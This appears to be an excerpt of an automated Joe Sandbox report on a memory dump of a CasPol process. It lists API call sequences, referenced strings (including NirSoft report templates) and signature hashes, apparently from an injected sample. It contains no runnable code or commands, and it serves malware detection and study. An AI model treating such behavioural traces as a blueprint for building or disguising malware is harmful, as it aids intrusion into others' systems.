                                                                                                                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                              • API String ID: 2012295524-70141382
                                                                                                                                                              • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                              • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                              • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                              • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                              • API String ID: 667068680-3953557276
                                                                                                                                                              • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                              • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                              • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                              • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1700100422-0
                                                                                                                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                              APIs
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 552707033-0
                                                                                                                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                              • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                              • strchr.MSVCRT ref: 0040C140
                                                                                                                                                              • strchr.MSVCRT ref: 0040C151
                                                                                                                                                              • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                              • memset.MSVCRT ref: 0040C17A
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                              • String ID: 4$h
                                                                                                                                                              • API String ID: 4066021378-1856150674
                                                                                                                                                              • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                              • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                              • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                              • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_snwprintf
                                                                                                                                                              • String ID: %%0.%df
                                                                                                                                                              • API String ID: 3473751417-763548558
                                                                                                                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                              APIs
                                                                                                                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                              • GetParent.USER32(?), ref: 00406136
                                                                                                                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                              • String ID: A
                                                                                                                                                              • API String ID: 2892645895-3554254475
                                                                                                                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                              APIs
                                                                                                                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                              • memset.MSVCRT ref: 0040DA23
                                                                                                                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                              • String ID: caption
                                                                                                                                                              • API String ID: 973020956-4135340389
                                                                                                                                                              • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                              • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                              • API String ID: 1283228442-2366825230
                                                                                                                                                              • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                              • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                              APIs
                                                                                                                                                              • wcschr.MSVCRT ref: 00413972
                                                                                                                                                              • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                              • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                              • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                              • memset.MSVCRT ref: 004139B8
                                                                                                                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                              • memset.MSVCRT ref: 00413A00
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                              • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                              • String ID: \systemroot
                                                                                                                                                              • API String ID: 4173585201-1821301763
                                                                                                                                                              • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                              • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                              • String ID: 0$6
                                                                                                                                                              • API String ID: 4066108131-3849865405
                                                                                                                                                              • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                              • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004082EF
                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                              • memset.MSVCRT ref: 00408362
                                                                                                                                                              • memset.MSVCRT ref: 00408377
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$ByteCharMultiWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 290601579-0
                                                                                                                                                              • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                              • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$wcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3592753638-3916222277
                                                                                                                                                              • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                              • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040A47B
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                              • String ID: %s (%s)$YV@
                                                                                                                                                              • API String ID: 3979103747-598926743
                                                                                                                                                              • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                              • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                              • API String ID: 2780580303-317687271
                                                                                                                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                                                                                              • API String ID: 2767993716-572158859
                                                                                                                                                              • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                              • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                              Strings
